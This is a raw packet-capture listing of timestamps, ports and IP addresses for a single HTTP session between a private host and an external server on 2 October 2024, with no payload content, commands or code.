Oct 2, 2024 18:19:30.935019016 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.935053110 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.935053110 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.935069084 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.935096025 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.935121059 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.935174942 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.935189962 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.935205936 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.935220957 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.935240030 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.935288906 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.935511112 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.935555935 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.935556889 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.935570955 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.935606003 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.935606003 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.935627937 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.935627937 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.935643911 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.935651064 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.935663939 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.935682058 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.935695887 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.935719967 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.935739994 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.935770035 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.935790062 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.935811043 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.935822964 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.935837984 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.935868979 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.935880899 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.935919046 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.935951948 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.935966969 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.935981989 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.935987949 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.936017036 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.936037064 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.936484098 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.936538935 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.936553955 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.936582088 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.936624050 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.936630011 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.936645031 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.936660051 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.936702967 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.936738014 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.936743975 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.936753035 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.936769009 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.936779976 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.936784029 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.936803102 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.936835051 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.936868906 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.936883926 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.936897993 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.936913013 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.936923027 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.936928034 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.936952114 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.936976910 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.936986923 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.937022924 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.937041998 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.937084913 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.937197924 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.937252045 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.937252998 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.937268019 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.937295914 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.937319994 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.937352896 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.937367916 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.937383890 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.937398911 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.937402010 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.937427044 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.937452078 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.937469959 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.937505960 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.937576056 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.937589884 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.937604904 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.937619925 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.937634945 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.937637091 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.937652111 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.937666893 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.937674046 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.937704086 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.937721968 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.937746048 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.937791109 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.937808990 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.937823057 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.937838078 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.937861919 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.937901020 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.937906027 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.937932014 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.937947989 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.937961102 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.937974930 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.938020945 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.938044071 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.938059092 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.938074112 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.938088894 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.938096046 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.938112020 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.938122034 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.938126087 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.938141108 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.938163042 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.938169003 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.938185930 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.938194036 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.938200951 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.938208103 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.938247919 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.938370943 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.938385963 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.938416004 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.938451052 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.994710922 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.994740963 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.994755983 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.994779110 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.994781017 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.994793892 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.994806051 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.994810104 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.994856119 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.994864941 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.994872093 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.994935989 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.994955063 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.994967937 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.994983912 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.995002985 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.995040894 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.995052099 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.995065928 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.995080948 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.995094061 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.995095968 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.995111942 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.995124102 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.995130062 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.995170116 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.995170116 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.995213032 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.995239973 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.995254993 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.995281935 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.995304108 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.995358944 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.995373011 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.995407104 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.995419025 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.995433092 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.995446920 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.995456934 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.995464087 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.995493889 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.995527983 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.996021986 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.996047974 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.996062994 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.996100903 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.996141911 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.996174097 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.996190071 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.996205091 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.996218920 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.996234894 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.996239901 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.996254921 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.996280909 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.996309042 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.996330976 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.996346951 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.996354103 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.996361017 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.996373892 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.996376038 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.996390104 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.996397972 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.996419907 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.996458054 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.027411938 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.027427912 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.027443886 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.027475119 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.027504921 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.027507067 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.027519941 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.027534962 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.027550936 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.027559042 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.027568102 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.027580023 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.027601957 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.027625084 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.027645111 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.027746916 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.027761936 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.027775049 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.027776957 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.027785063 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.027791977 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.027807951 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.027822018 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.027829885 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.027872086 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.027941942 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.027988911 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.027995110 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.028009892 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.028053045 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.028069019 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.028074026 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.028084040 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.028100014 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.028114080 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.028115988 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.028139114 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.028148890 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.028171062 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.028204918 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.028239012 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.028259993 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.028275967 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.028290033 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.028310061 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.028343916 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.028352022 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.028366089 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.028381109 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.028394938 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.028398037 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.028433084 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.028466940 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.029056072 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.029129028 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.029161930 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.029198885 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.504643917 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.509665012 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.735872984 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.735892057 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.735907078 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.735922098 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.735939026 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.735949993 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.735982895 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.735986948 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.735997915 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.736038923 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.736040115 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.736054897 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.736071110 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.736076117 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.736085892 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.736105919 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.736115932 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.736133099 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.736140966 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.736175060 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.736215115 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.736227989 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.736244917 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.736251116 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.736268997 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.736282110 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.736287117 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.736298084 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.736304998 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.736314058 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.736327887 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.736336946 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.736362934 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.736388922 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.736391068 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.736403942 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.736439943 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.736450911 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.736457109 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.736524105 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.736540079 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.736551046 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.736557007 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.736572981 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.736577034 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.736604929 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.736629009 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.736641884 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.736656904 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.736680031 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.736682892 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.736696959 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.736702919 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.736713886 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.736723900 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.736728907 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.736742020 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.736752987 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.736762047 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.736768961 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.736773014 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.736783981 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.736792088 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.736809015 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.736828089 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.736840010 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.736859083 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.736876011 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.736881018 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.736896038 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.736898899 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.736920118 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.736937046 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.736970901 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.736985922 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.737000942 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.737026930 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.737027884 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.737042904 CEST	80	49737	185.215.113.37	192.168.2.4
